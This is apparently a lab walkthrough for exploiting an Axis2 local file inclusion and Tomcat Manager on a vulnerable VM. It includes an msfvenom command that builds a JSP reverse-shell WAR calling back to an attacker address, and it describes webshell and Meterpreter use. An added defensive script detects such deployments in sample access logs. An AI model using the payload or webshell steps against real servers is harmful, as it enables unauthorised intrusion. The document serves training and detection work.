The Tomcat Manager login is usually abused through vulnerabilities or by guessing or brute-forcing the credentials, but there is yet another way. The Apache Axis2 web service has a local file inclusion (LFI) vulnerability that can be exploited to reveal credentials stored in configuration files. The relationship between Apache Axis2 and Tomcat Manager is then abused to execute commands on the target.
What You Will Learn
- How to exploit the Axis2 web service
- How to attack the Tomcat Manager service
- Creating a JSP webshell to get command execution
- Exploit Tomcat Manager without using Metasploit
Here’s What You Need
- Axis2 Vulnerable Machine – VirtualBox
- Kali Linux Virtual Machine – VirtualBox
Recon
Kick it off with an nmap scan to identify the running services.
The scan shows that the Tomcat Manager service is running, and SSH is listening for connections too.
Exploit Tomcat Manager Without Using Metasploit
The Axis2 web service can be abused to reveal passwords found in configuration files on the server.
Upload WAR File
This is a non-staged payload, which means you only need a netcat listener to catch the shell back.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.250 LPORT=1234 -f war > shell.war
To execute the webshell, either visit the context path directly or click on the /warshell link shown in the Tomcat Manager admin console.
Upload A JSP Webshell
Get a JSP webshell from GitHub, save it in a file named jspwebshell.jsp, and then package it into a .war file.
Check to verify that the webshell is deployed on the server.
Now I have remote command execution using the newly uploaded webshell.
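From the defender's side, both deployment routes used above (the Manager HTML upload form and the text API) and the first requests into the newly created context leave a clear trace in Tomcat's access log. The script below is an added example, not code from the original post; the log lines are constructed, and the IP addresses, usernames, timestamps and context names in them are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Tomcat access_log lines (AccessLogValve "common" pattern with %u filled in); not real traffic.
SAMPLE_LOG = """\
10.0.0.250 - - [01/Jan/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.0.0.250 - admin [01/Jan/2024:10:00:02 +0000] "GET /manager/html HTTP/1.1" 200 18231
10.0.0.250 - admin [01/Jan/2024:10:00:09 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 19120
10.0.0.250 - - [01/Jan/2024:10:00:15 +0000] "GET /warshell/ HTTP/1.1" 200 0
10.0.0.250 - tomcat [01/Jan/2024:10:01:00 +0000] "PUT /manager/text/deploy?path=/jspwebshell HTTP/1.1" 200 75
10.0.0.250 - - [01/Jan/2024:10:01:05 +0000] "GET /jspwebshell/jspwebshell.jsp?cmd=id HTTP/1.1" 200 212
10.0.0.7 - - [01/Jan/2024:10:02:00 +0000] "GET /axis2/services/listServices HTTP/1.1" 200 5120
"""

# ip, ident, remote user, timestamp, request line, status
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Manager endpoints that deploy a WAR: the HTML console's upload form and the text (script) API.
DEPLOY_PREFIXES = ("/manager/html/upload", "/manager/text/deploy", "/manager/deploy")

def parse(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def detect(log_text):
    """Return (kind, ip, user, detail) alerts for successful Manager deployments
    and for later requests into any context those deployments created."""
    alerts, new_contexts = [], set()
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec or rec["status"] != "200":  # failed logins and errors are not deployments
            continue
        url = urlsplit(rec["target"])
        if url.path.startswith(DEPLOY_PREFIXES):
            # The text API names the context in ?path=; the HTML upload takes it from the
            # WAR file name, which is not in the URL, so that deployment is logged without one.
            ctx = parse_qs(url.query).get("path", ["<from uploaded WAR name>"])[0]
            if ctx.startswith("/"):
                new_contexts.add(ctx)
            alerts.append(("manager_deploy", rec["ip"], rec["user"], ctx))
        elif any(url.path == c or url.path.startswith(c + "/") for c in new_contexts):
            alerts.append(("new_context_request", rec["ip"], rec["user"], url.path))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```

Feeding a real access log through the same function is enough to correlate a Manager deployment with the first hits on the context it created; alerting on any successful request to the deploy endpoints is reasonable on hosts where nobody is expected to deploy through the Manager at all.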
Exploit Using Metasploit
With the credentials now found, I can use Metasploit to open a Meterpreter session on the target.
Now I have an additional way of executing commands on the target.